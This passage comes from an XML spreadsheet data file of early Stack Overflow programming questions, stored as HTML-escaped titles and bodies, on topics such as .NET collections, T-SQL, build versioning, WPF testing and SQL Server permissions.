&lt;p&gt;For the purposes of UI, I need to display &lt;code&gt;5.6&lt;/code&gt;. I poked around the Internet and found some &lt;a href="http://mail.python.org/pipermail/python-list/2005-September/340383.html"&gt;documentation&lt;/a&gt; that this is dependent on my implementation of Python. Unfortunately, this occurs on both my Windows dev machine and each Linux server I've tried. &lt;a href="http://www.python.org/doc/2.5.1/tut/node16.html"&gt;See here also&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Short of creating my own round library, is there any way around this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the Liskov Substitution Principle?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have heard that the Liskov Substitution  Principle (LSP) is a fundamental principle of object oriented design. What is it and what are some examples of its use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Right Align text in SQL Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We all know T-SQL's string manipulation capabilities sometimes leaves much to be desired...&lt;/p&gt;
&lt;p&gt;I have a numeric field that needs to be output in T-SQL as a right-aligned text column. Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Value
----------
   143.55
  3532.13
     1.75
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How would you go about that? A good solution ought to be clear and compact, but remember there is such a thing as "too clever".&lt;/p&gt;
&lt;p&gt;I agree this is the wrong place to do this, but sometimes we're stuck by forces outside our control.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to reduce sequences in an array of strings</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Please, now that I've re-written the question, and before it suffers from further &lt;a href="http://stackoverflow.com/questions/56103/fastest-gun-in-the-west-problem" rel="nofollow"&gt;fast-gun answers&lt;/a&gt; or premature closure by &lt;a href="http://stackoverflow.com/users/905/keith" rel="nofollow"&gt;eager editors&lt;/a&gt; let me point out that this is not a duplicate of &lt;a href="http://stackoverflow.com/questions/9673/remove-duplicates-from-array" rel="nofollow"&gt;this question&lt;/a&gt;.  I know how to remove duplicates from an array.&lt;/p&gt;
&lt;p&gt;This question is about removing &lt;strong&gt;sequences&lt;/strong&gt; from an array, not duplicates in the strict sense.&lt;/p&gt;
&lt;p&gt;Consider this sequence of elements in an array;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[0] a
[1] a
[2] b
[3] c
[4] c
[5] a
[6] c
[7] d
[8] c
[9] d
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this example I want to obtain the following...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[0] a
[1] b
[2] c
[3] a
[4] c
[5] d
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Notice that duplicate elements are retained but that sequences of the same element have been reduced to a single instance of that element.&lt;/p&gt;
&lt;p&gt;Further, notice that when two lines repeat they should be reduced to one set (of two lines).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[0] c
[1] d
[2] c
[3] d
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...reduces to...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[0] c
[1] d
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm coding in C# but algorithms in any language appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which .Net collection for adding multiple objects at once and getting notified?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Was considering the &lt;code&gt;System.Collections.ObjectModel ObservableCollection&amp;lt;T&amp;gt;&lt;/code&gt; class. This one is strange because  &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;it has an Add Method which takes &lt;strong&gt;one&lt;/strong&gt; item only. No AddRange or equivalent. &lt;/li&gt;
&lt;li&gt;the Notification event arguments has a NewItems property, which is a &lt;strong&gt;IList&lt;/strong&gt; (of objects.. not T)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;My need here is to add a batch of objects to a collection and the listener also gets the batch as part of the notification. Am I missing something with ObservableCollection ? Is there another class that meets my spec?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Update: Don't want to roll my own as far as feasible. I'd have to build in add/remove/change etc.. a whole lot of stuff.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr&gt;&lt;/p&gt;
&lt;p&gt;Related Q:&lt;br&gt;
&lt;a href="http://stackoverflow.com/questions/670577/observablecollection-doesnt-support-addrange-method-so-i-get-notified-for-each/670579#670579"&gt;http://stackoverflow.com/questions/670577/observablecollection-doesnt-support-addrange-method-so-i-get-notified-for-each&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there any disadvantage to returning this instead of void?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say instead of returning void a method you returned a reference to the class even if it didn't make any particular semantic sense.  It seems to me like it would give you more options on how the methods are called, allowing you to use it in a fluent-interface-like style and I can't really think of any disadvantages since you don't have to do anything with the return value (even store it).&lt;/p&gt;
&lt;p&gt;So suppose you're in a situation where you want to update an object and then return its current value.
instead of saying &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;myObj.Update();
var val = myObj.GetCurrentValue();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;you will be able to combine the two lines to say&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var val = myObj.Update().GetCurrentValue();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;  I asked the below on a whim, in retrospect, I agree that its likely to be unnecessary and complicating, however my question regarding returning this rather than void stands.&lt;/p&gt;
&lt;p&gt;On a related note, what do you guys think of having the language include a new bit of syntactic sugar:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var val = myObj.Update()&amp;lt;.GetCurrentValue();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This operator would have a low order of precedence so myObj.Update() would execute first and then call  GetCurrentValue() on myObj instead of the void return of Update.&lt;/p&gt;
&lt;p&gt;Essentially I'm imagining an operator that will say "call the method on the right-hand side of the operator on the first valid object on the left".  Any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What collaboration tools are effective for working with non-technical people?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For programmers working in corporate environments and outside of the start up world, there are a wide variety of non-technical people that are important stakeholders in the development process.  These include other functions within the company such as marketing, finance and legal, for example, and also include customers and others outside the company.&lt;/p&gt;
&lt;p&gt;The point of this question is not â€œcare and feedingâ€ of these groups, but simply what tools have been found to work to facilitate collaboration and necessary interaction?  Iâ€™m thinking along of the lines of IM versus wikis versus traditional email distribution lists, or the corporate sharepoint portal, but wonder what others have found to work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get the current user's Local Settings folder path in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to point a file dialog at a particular folder in the current user's Local Settings folder on Windows.  What is the shortcut to get this path?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>web page cache setexpires</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Will the code below work if the clock on the server is ahead of the clock on the client?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Response.Cache.SetExpires(DateTime.Now.AddSeconds(-1))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;EDIT: the reason I ask is on one of our web apps some users are claiming they are seeing the pages ( account numbers, etc ) from a user that previously used that machine.  Yet we use the line above and others to 'prevent' this from happening.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any tool to migrate repo from Vault to Subversion?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any &lt;strong&gt;tools&lt;/strong&gt; to facilitate a migration from &lt;a href="http://www.sourcegear.com/vault/index.html"&gt;Sourcegear's Vault&lt;/a&gt; to &lt;a href="http://subversion.tigris.org/"&gt;Subversion&lt;/a&gt;?&lt;/p&gt;
&lt;p&gt;I'd really prefer an existing tool or project (I'll buy!).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;One-time migration only&lt;/li&gt;
&lt;li&gt;Full history with comments&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;Optional:&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Some support for labels/branches/tags&lt;/li&gt;
&lt;li&gt;Relatively speedy. It can take hours but not days.&lt;/li&gt;
&lt;li&gt;Cost if available&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Bonus points if you can share personal experience related to this process.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;One of the reasons I'd like to do this is because we have lots of projects spread between Vault and Subversion (we're finally away from sourcesafe). It'd be helpful in some situations to be able to consolidate a particular customer's repos to SVN.&lt;/p&gt;
&lt;p&gt;Additionally, SVN is better supported among third party tools. For example, &lt;a href="http://hudson.dev.java.net/"&gt;Hudson&lt;/a&gt; and &lt;a href="http://www.redmine.org/"&gt;Redmine&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Again, though: we're not abandoning vault altogether.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I check that a Windows QFE/patch has been installed from c#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the best way in c# to determine is a given QFE/patch has been installed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Continue Considered Harmful?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Should developers avoid using &lt;a href="http://msdn.microsoft.com/en-us/library/923ahwt1.aspx"&gt;continue&lt;/a&gt; in C# or its equivalent in other languages to force the next iteration of a loop? Would arguments for or against overlap with arguments about &lt;a href="http://stackoverflow.com/questions/46586/goto-still-considered-harmful"&gt;Goto&lt;/a&gt;? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best build process solution to manage build versions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I run a rather complex project with several independent applications. These use however a couple of shared components. So I have a source tree looking something like the below.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;My Project 
&lt;ul&gt;
&lt;li&gt;Application A&lt;/li&gt;
&lt;li&gt;Shared1&lt;/li&gt;
&lt;li&gt;Shared2 &lt;/li&gt;
&lt;li&gt;Application B &lt;/li&gt;
&lt;li&gt;Application C&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All applications have their own MSBuild script that builds the project and all the shared resources it needs. I also run these builds on a CruiseControl controlled continuous integration build server. &lt;/p&gt;
&lt;p&gt;When the applications are deployed they are deployed on several servers to distribute load. This means that itâ€™s &lt;em&gt;extremely&lt;/em&gt; important to keep track of what build/revision is deployed on each of the different servers (we need to have the current version in the DLL version, for example â€œ1.0.0.68â€). &lt;/p&gt;
&lt;p&gt;Itâ€™s equally important to be able to recreate a revision/build that been built to be able to roll back if something didnâ€™t work out as intended (o yes, that happends ...). Today weâ€™re using SourceSafe for source control but that possible to change if we could present good reasons for that (SS itâ€™s actually working ok for us &lt;em&gt;so&lt;/em&gt; far). &lt;/p&gt;
&lt;p&gt;Another principle that we try to follow is that itâ€™s only code that been build and tested by the integration server that we deploy further. &lt;/p&gt;
&lt;h2&gt;"CrusieControl Build Labels" solution&lt;/h2&gt;
&lt;p&gt;We had several ideas on solving the above. The first was to have the continuous integration server build and locally deploy the project and test it (it does that now). As you probably know a successful build in CruiseControl generates a build label and I guess we somehow could use that to set the DLL version of our executables (so build label 35 would create a DLL like â€œ1.0.0.35â€ )? The idea was also to use this build label to label the &lt;strong&gt;complete&lt;/strong&gt; source tree. Then we probably could check out by that label and recreate the build later on. &lt;/p&gt;
&lt;p&gt;The reason for labeling the complete tree is to include not only the actual application code (thatâ€™s in one place in the source tree) but also all the shared items (thatâ€™s in different places in the tree). So a successful build of â€œApplication Aâ€ would label to whole tree with label â€œApplicationA35â€ for example. &lt;/p&gt;
&lt;p&gt;There might however be an issue when trying to recreate this build and setting the DLL version before deploying as we then donâ€™t have access to the CruiseControl generated build label anymore. If all CrusieControl build labels were unique for all the projects we could use only the number for labeling but thatâ€™s not the case (both application A and B could at the same time be on build 35) so we have to include the application name in the label. Hence SourceSafe label â€œApplication35â€. &lt;strong&gt;How can I then recreate build 34 and set 1.0.0.34 to the DLL version numbers once we built build 35?&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;"Revision number" solution&lt;/h2&gt;
&lt;p&gt;Someone told me that Subversion for example creates a revision number for the entire source tree on every check in â€“ &lt;strong&gt;is this the case? Has SourceSafe something similar?&lt;/strong&gt; If this is correct the idea is then to grab that revision number when getting latest and build on the CruiseControl server. The revision number could then be used to set the DLL version number (to for example â€œ1.0.0.5678â€). I guess we could then get this specific revision for the Subversion if needed and that then would include that application and all the shared items to be able to recreate a specific version from the past. &lt;strong&gt;Would that work and could this also be achived using SourceSafe?&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;Summarize&lt;/h2&gt;
&lt;p&gt;So the two main requirements are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Be able to &lt;strong&gt;track build/revision number of the build and deployed DLL.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Be able to &lt;strong&gt;rebuild a past revision/build, set the old build/revision number on the executables of that build&lt;/strong&gt; (to comply with requirement 1).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;So how would you solve this?&lt;/strong&gt; What would be your preferred approach and &lt;strong&gt;how&lt;/strong&gt; would you solve it (or do you have a totally different idea?)? **Pleased give detailed answers. **&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Bonus question&lt;/em&gt; What are the difference between a revision number and a build number and when would one really need both?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio 2008 / Web site problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using VS 2008 with SP1 and the IE 8 beta 2. Whenever I start a new Web site or when I double-click an ASPX in the solution explorer, VS insists on attempting to the display the ASPX page in a free-standing IE browser instance. The address is the local file path to the ASPX it's trying to load and an error that says, "The XML page cannot be displayed" is shown. &lt;/p&gt;
&lt;p&gt;Otherwise, things work work correctly (I just close the offending browser window. ASP.NET is registered with IIS and I have no other problems. I have tested my same configuration on other PCs and it works fine. Has anyone had this problem? &lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;rp&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the bare minimum permission set for Sql Server 2005 services?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Best practices recommend not installing Sql Server to run as SYSTEM.  What is the bare minumum you need to give the user account you create for it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to attach debugger to step into native (C++) code from a managed (C#) wrapper?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a wrapper around a C++ function call which I call from C# code. How do I attach a debugger in Visual Studio to step into the native C++ code?&lt;/p&gt;
&lt;p&gt;This is the wrapper that I have which calls GetData() defined in a C++ file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    [DllImport("Unmanaged.dll", CallingConvention=CallingConvention.Cdecl, 
               EntryPoint = "GetData", BestFitMapping = false)]
        public static extern String GetData(String url);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The code is crashing and I want to investigate the root cause.&lt;/p&gt;
&lt;p&gt;Thanks,
Nikhil&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I increase the number of default rows per page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Grails scaffolding defaults to 10 rows per page.  I would like to increase that number without generating the views and changing the 10 in every file.  Where do I change the default?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the overhead cost associated with IoC containers like StructureMap?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After attending a recent Alt.NET group on IoC, I got to thinking about the tools available and how they might work.  &lt;code&gt;StructureMap&lt;/code&gt; in particular uses both attributes and bootstrapper concepts to map requests for &lt;code&gt;IThing&lt;/code&gt; to &lt;code&gt;ConcreteThing&lt;/code&gt;.  Attributes automatically throw up flags for me that either reflection or IL injection is going on.  Does anyone know exactly how this works (for &lt;code&gt;StructureMap&lt;/code&gt; or other IoC tools) and what the associated overhead might be either at run-time or compile-time?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Building Flex projects in ant/nant</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a recurring problem at my company with build breaks in our Flex projects. The problem primarily occurs because the build that the developers do on their local machines is fundamentally different from the build that occurs on the build machine. The devs are building the projects using &lt;code&gt;FlexBuilder/eclipse&lt;/code&gt; and the build machine is using the command line compilers. Inevitably, the &lt;code&gt;{projectname}-config.xml&lt;/code&gt; and/or the batch file that runs the build get out of sync with the project files used by eclipse, so the the build succeeds on the dev's machine, but fails on the build machine.&lt;/p&gt;
&lt;p&gt;We started down the path of writing a utility program to convert FlexBuilder's project files into a &lt;code&gt;{projectname}-config.xml&lt;/code&gt; file, but it's a) undocumented and b) a horrible hack.&lt;/p&gt;
&lt;p&gt;I've looked into the -dump-config switch to get the config files, but this has a couple of problems: 1) The generated config file has absolute paths which doesn't work in our environment (some developers use macs, some windows machines), and 2) only works right when run from the IDE, so can't be build into the build process.&lt;/p&gt;
&lt;p&gt;Tomorrow, we are going to discuss a couple of options, neither of which I'm terribly fond of:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;a)&lt;/strong&gt; Add a post check-in event to Subversion to remove these absolute references, or &lt;br&gt;
&lt;strong&gt;b)&lt;/strong&gt; add a pre-build process that removes the absolute reference.&lt;/p&gt;
&lt;p&gt;I can't believe that we are the first group of developers to run across this issue, but I can't find any good solutions on Google. How have other groups dealt with this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>OOP class design, Is this design inherently 'anti' OOP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I remember back when MS released a forum sample application, the design of the application was like this:&lt;/p&gt;
&lt;p&gt;/Classes/User.cs
/Classes/Post.cs
...
/Users.cs
/Posts.cs&lt;/p&gt;
&lt;p&gt;So the classes folder had just the class i.e. properties and getters/setters.
The Users.cs, Post.cs, etc. have the actual methods that access the Data Access Layer, so Posts.cs might look like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Posts
{
    public static Post GetPostByID(int postID)
    {
          SqlDataProvider dp = new SqlDataProvider();
          return dp.GetPostByID(postID);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Another more traditional route would be to put all of the methods in Posts.cs into the class definition also (Post.cs).&lt;/p&gt;
&lt;p&gt;Splitting things into 2 files makes it much more procedural doesn't it?
Isn't this breaking OOP rules since it is taking the behavior out of the class and putting it into another class definition?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are CLR stored procedures preferred over TSQL stored procedures in SQL 2005+?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My current view is no, prefer Transact SQL stored procedures because they are a lighter weight and (possibly) higher performing option, while CLR procedures allow developers to get up to all sorts of mischief.&lt;/p&gt;
&lt;p&gt;However recently I have needed to debug some very poorly written TSQL stored procs.  As usual I found many of the problems due to the original developer developer having no real TSQL experience, they were  ASP.NET / C# focused.&lt;/p&gt;
&lt;p&gt;So, using CLR procedures would firstly provide a much more familiar toolset to this type of developer, and secondly, the debugging and testing facilities are more powerful (ie Visual Studio instead of SQL Management Studio).  &lt;/p&gt;
&lt;p&gt;I'd be very interested in hearing your experience as it's seems it is not a simple choice. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rendering Graphics in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any other way to render graphics in C# beyond GDI+ and XNA? (For the development of a tile map editor)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UnhandledException handler in a .Net Windows Service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to use an UnhandledException Handler in a Windows Service?&lt;/p&gt;
&lt;p&gt;Normally I would use a custom built Exception Handling Component that does logging, phone home, etc. This component adds a handler to System.AppDomain.CurrentDomain.UnhandledException but as far as I can tell this doesnâ€™t achieve anything win a Windows Service so I end up with this pattern in my 2 (or 4) Service entry points:&lt;/p&gt;
&lt;pre&gt;
&lt;code&gt;
    Protected Overrides Sub OnStart(ByVal args() As String)
        ' Add code here to start your service. This method should set things
        ' in motion so your service can do its work.
        Try
            MyServiceComponent.Start()
        Catch ex As Exception
            'call into our exception handler
            MyExceptionHandlingComponent.ManuallyHandleException (ex)
            'zero is the default ExitCode for a successfull exit, so if we set it to non-zero
            ExitCode = -1
            'So, we use Environment.Exit, it seems to be the most appropriate thing to use
            'we pass an exit code here as well, just in case.
            System.Environment.Exit(-1)
        End Try
    End Sub
&lt;/code&gt;
&lt;/pre&gt;
&lt;p&gt;Is there a way my Custom Exception Handling component can deal with this better so I don't have to fill my OnStart with messy exception handling plumbing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tools for manipulating PowerPoint files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do you know managed tools for manipulating PowerPoint files?
The tool should be 100% managed code and offer the option to
handle .ppt and .pptx files.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to test a WPF user interface?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using win forms with an &lt;a href="http://en.wikipedia.org/wiki/Model-view-controller"&gt;MVC&lt;/a&gt;/&lt;a href="http://msdn.microsoft.com/en-us/magazine/cc188690.aspx"&gt;MVP&lt;/a&gt; architecture, I would normally use a class to wrap a view to test the UI while using mocks for the model and controller/presenter.  The wrapper class would make most everything in the UI an observable property for the test runner through properties and events.&lt;/p&gt;
&lt;p&gt;Would this be a viable approach to testing a WPF app?  Is there a better way? Are there any gotchas to watch out for?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Avoiding first chance exception messages when the exception is safely handled</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The following bit of code catches the EOS Exception&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using (var reader = new BinaryReader(httpRequestBodyStream)) {
    try {
        while (true) {
            bodyByteList.Add(reader.ReadByte());
        }
    } catch (EndOfStreamException) { }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So why do I still receive first-chance exceptions in my console? &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;A first chance exception of type 'System.IO.EndOfStreamException' occurred in mscorlib.dll&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Is there a way to hide these first chance exception messages?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using .NET, how can you find the mime type of a file based on the file signature not the extension</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a simple way to get a mime type where the file extension is incorrect or not given, something similar to &lt;a href="http://stackoverflow.com/questions/51438/getting-a-files-mime-type-in-java" rel="nofollow"&gt;this question&lt;/a&gt; only in .Net.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Version control of deliverables</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We need to regularly synchronize many dozens of binary files (project executables and DLLs) between many developers at several different locations, so that every developer has an up to date environment to build and test at. Due to nature of the project, updates must be done often and on-demand (overnight updates are not sufficient). This is not pretty, but we are stuck with it for a time.&lt;/p&gt;
&lt;p&gt;We settled on using a regular version (source) control system: put everything into it as binary files, get-latest before testing and check-in updated DLL after testing.&lt;/p&gt;
&lt;p&gt;It works fine, but a version control client has a lot of features which don't make sense for us and people occasionally get confused.&lt;/p&gt;
&lt;p&gt;Are there any tools better suited for the task? Or may be a completely different approach?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; I need to clarify that it's not a tightly integrated project - more like extensible system with a heap of "plugins", including thrid-party ones. We need to make sure those modules-plugins works nicely with recent versions of each other and the core. Centralised build as was suggested was considered initially, but it's not an option.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to resolve SQL query parameters mapping issues while using Oracle OLE DB provider?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When trying to enter a SQL query with parameters using the Oracle OLE DB provider I get the following error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Parameters cannot be extracted from the SQL command. The provider might not help to parse parameter information from the command. In that case, use the "SQL command from variable" access mode, in which the entire SQL command is stored in a variable.&lt;br /&gt;
  ADDITIONAL INFORMATION:&lt;br /&gt;
  Provider cannot derive parameter information and SetParameterInfo has not been called. (Microsoft OLE DB Provider for Oracle) &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I have tried following the suggestion here but don't quite understand what is required:&lt;a href="http://microsoftdw.blogspot.com/2005/11/parameterized-queries-against-oracle.html"&gt;Parameterized queries against Oracle&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Default button size?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I create a button control (with &lt;code&gt;CreateWindow&lt;/code&gt; of a &lt;code&gt;BUTTON&lt;/code&gt; window class) that has a standard system-wide size (especially height) that's consistent with the rest of Windows applications?
I should of course take DPI into account and probably other settings.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Remark:&lt;/strong&gt; Using &lt;code&gt;USE_CW_DEFAULT&lt;/code&gt; for width and height results in a 0, 0 size button, so that's not a solution.&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>"Quoted-printable line longer than 76 chars" warning when sending HTML E-Mail</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have written some code in my VB.NET application to send an HTML e-mail (in this case, a lost password reminder).&lt;/p&gt;
&lt;p&gt;When I test the e-mail, it gets eaten by my spam filter.  One of the things that it's scoring badly on is because of the following problem:&lt;/p&gt;
&lt;pre&gt;MIME_QP_LONG_LINE  RAW: Quoted-printable line longer than 76 chars&lt;/pre&gt;
&lt;p&gt;I've been through the source of the e-mail, and I've broken each line longer than 76 characters into two lines with a CR+LF in between, but that hasn't fixed the problem.&lt;/p&gt;
&lt;p&gt;Can anyone point me in the right direction?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows CDROM Eject</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know a method to programmatically close the CD tray on Windows 2000 or higher?
Open CD tray exists, but I can't seem to make it close especially under W2k. &lt;/p&gt;
&lt;p&gt;I am especially looking for a method to do this from a batch file, if possible, but API calls would be OK.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Open source PDF library for C/C++ application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to be able to generate PDF ouput from my (native) C++ Windows application. Are there any free/open source libraries available to do this?&lt;/p&gt;
&lt;p&gt;I looked at the answers to &lt;a href="http://stackoverflow.com/questions/177/how-do-i-programmatically-create-a-pdf-in-my-net-application" rel="nofollow"&gt;this question&lt;/a&gt;, but they mostly relate to .Net.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get raw logs from Google Analytics?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to obtain raw logs from Google Analytic? Is there any tool that can generate the raw logs from GA?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting SVG to PNG using C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to convert SVG images to PNG using C#, without having to write too much code. Can anyone recommend a library or example code for doing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Access to Result sets from within Stored procedures Transact-SQL SQL Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using SQL Server 2005, and I would like to know how to access different result sets from within transact-sql. The following stored procedure returns two result sets, how do I access them from, for example, another stored procedure?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE PROCEDURE getOrder (@orderId as numeric) AS
BEGIN   
    select order_address, order_number from order_table where order_id = @orderId
    select item, number_of_items, cost from order_line where order_id = @orderId
END
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I need to be able to iterate through both result sets individually.&lt;/p&gt;
&lt;p&gt;EDIT: Just to clarify the question, I want to test the stored procedures. I have a set of stored procedures which are used from a VB.NET client, which return multiple result sets. These are not going to be changed to a table valued function, I can't in fact change the procedures at all. Changing the procedure is not an option.&lt;/p&gt;
&lt;p&gt;The result sets returned by the procedures are not the same data types or number of columns.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Enforce SSL in code in an ashx handler</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a site, which contains several ashx handlers, on a couple of the handlers I want to reject non-SSL requests. Is there a way that I can do this in code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SqlServer Express slow performance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am stress testing a .NET web application.  I did this for 2 reasons: I wanted to see what performance was like under real world conditions and also to make sure we hadn't missed any problems during testing. We had 30 concurrent users in the application using it as they would during the normal course of their jobs. Most users had multiple windows of the application open.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;10 Users: Not bad&lt;/li&gt;
&lt;li&gt;20 Users: Slowing down &lt;/li&gt;
&lt;li&gt;30 Users: Very, very slow but no timeouts&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It was loaded on the production server. It is a virtual server with a 2.66G Hz Xeon processor and 2 GB of RAM. We are using Win2K3 SP2. We have .NET 1.1 and 2.0 loaded and are using SQLExpress SP1.&lt;/p&gt;
&lt;p&gt;We rechecked the indexes on all of the tables afterword and they were all as they should be.&lt;/p&gt;
